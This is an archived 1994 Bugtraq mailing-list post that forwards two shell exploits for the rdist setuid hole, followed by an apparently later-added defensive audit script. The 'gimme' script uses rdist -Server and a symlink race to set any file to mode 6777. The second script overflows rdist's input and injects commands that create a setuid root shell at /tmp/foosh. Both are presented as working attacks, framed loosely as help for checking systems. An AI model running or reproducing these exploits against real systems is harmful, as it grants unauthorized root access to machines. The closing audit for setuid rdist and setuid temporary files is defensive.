Bugtraq mailing list archives

Those RDIST things


From: dave () elxr Jpl Nasa Gov (Dave Hayes)
Date: Mon, 14 Mar 1994 12:51:06 -0800


Figured I'd post them here first. This is nothing new, but it may provide
clues to some of you on how to check for the rdist hole.
------
Dave Hayes - Institutional Network & Communications - JPL/NASA - Pasadena CA
dave () elxr jpl nasa gov       dave () jato jpl nasa gov         ...usc!elroy!dxh

Nasrudin went into a bank with a check to cash. "Can you identify yourself?"
asked the clerk.
Nasrudin took out a mirror and peered into it. "Yes, that's me alright."


- ------cut here------

#! /bin/sh
# GIMME - "gimme' a file"
# Demonstrate rdist's ability to give me permission to access anything.
#
# gimme <pathname> [<permission> [<directory>]]
#       <pathname> is the target file.
#       <permission> is the octal mode to which the file access permission
#               should be set.  Note that this may not be effective unless
#               either the SUID (4000) or SGID (2000) bits are also requested.
#       <directory> is the target directory for rdist to use if a hard
#               link is desired.  Note that the user must have permission
#               to create this directory, it must be on the same filesystem
#               as the target file, and the target file must not be a
#               directory.  This option is necessary to change the ownership
#               of the target if chown() of a symbolic link modifies the
#               link itself, and not the file it refers to.
#
# 1991.9.14 -   Tsutomu Shimomura, Los Alamos National Laboratory
#               tsutomu () no-sense LANL GOV

dirname=gimme$$
deftemp=/tmp
defperm=6777

if [ $1x = x ]; then
        echo "Usage: $0 <pathname> [<permission> [<directory>]]" >&2
        exit 1
fi

if [ $2x != x ]; then
        perm=$2
else
        perm=$defperm
fi

if [ $3x != x ]; then
        link="ln"
        temp=$3/$dirname
        target=$1
else
        link="ln -s"
        temp=$deftemp/$dirname
        case $1 in
        /*)
                target=$1
                ;;
        *)
                target=`pwd`/$1
                ;;
        esac
fi

trap "rm -fr $temp; exit 1"  1 2 15
umask 66
mkdir $temp; if [ $? != 0 ]; then
        exit 1
fi

set `whoami` $LOGNAME
user=$1
set daemon `groups`
while [ $# != 1 ]; do
        shift
done
group=$1

(
        echo "t$temp/something"
        echo "R0 $perm 1 0 $user $group "

        while [ ! -f $temp/rdist* ]; do
                sleep 1
        done

        set $temp/rdist*
        rm -f $1
        if $link $target $1 >&2; then
                echo "" | dd bs=3 conv=sync 2>/dev/null
                echo ""

                echo 0 > $temp/status
        else
                echo 1 > $temp/status
        fi

        exit
) | rdist -Server

status=`cat $temp/status`
rm -fr $temp
exit $status

- ------cut here------

#!/bin/sh
SUID=/tmp/foosh
cat <<_EOF_ > test
Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaa
Scp /bin/sh $SUID
Schmod 4755 $SUID
_EOF_
cat test | /usr/ucb/rdist -Server localhost
rm -rf test
if [ -f $SUID ]; then
        echo "$SUID is a  setuid shell. "
fi

------- End of Forwarded Message
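
As an added example (not part of the original post and not code from rdist or its authors), a POSIX sh audit for the two conditions the scripts above depend on and leave behind: an rdist binary installed setuid, and setuid or setgid files in temporary directories, such as the /tmp/foosh the second script checks for. Only /usr/ucb/rdist appears in the post; the other rdist paths and the /var/tmp directory are assumptions.

```shell
#!/bin/sh
# Added defensive example; not part of the original post.

# Print each argument that is a regular file with the set-user-ID bit set.
setuid_binaries() {
    for p in "$@"; do
        if [ -f "$p" ] && [ -u "$p" ]; then
            printf '%s\n' "$p"
        fi
    done
}

# List setuid or setgid regular files under directory $1 without
# crossing filesystem boundaries. Unreadable subdirectories are skipped.
suid_files_under() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
    return 0
}

# Report findings; returns 1 if anything was found, 0 otherwise.
rdist_audit() {
    found=0
    # /usr/ucb/rdist is the path used in the post; the others are assumed
    # common install locations.
    hits=$(setuid_binaries /usr/ucb/rdist /usr/bin/rdist /usr/sbin/rdist)
    if [ -n "$hits" ]; then
        printf 'setuid rdist binary: %s\n' $hits
        found=1
    fi
    for d in /tmp /var/tmp; do
        [ -d "$d" ] || continue
        hits=$(suid_files_under "$d")
        if [ -n "$hits" ]; then
            printf 'setuid/setgid file in %s:\n%s\n' "$d" "$hits"
            found=1
        fi
    done
    return "$found"
}

# Run the audit only when invoked as: sh script.sh audit
if [ "${1:-}" = "audit" ]; then
    rdist_audit
fi
```

A setuid rdist is the precondition for both scripts, so a hit from the first check matters even when the temporary directories are clean.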


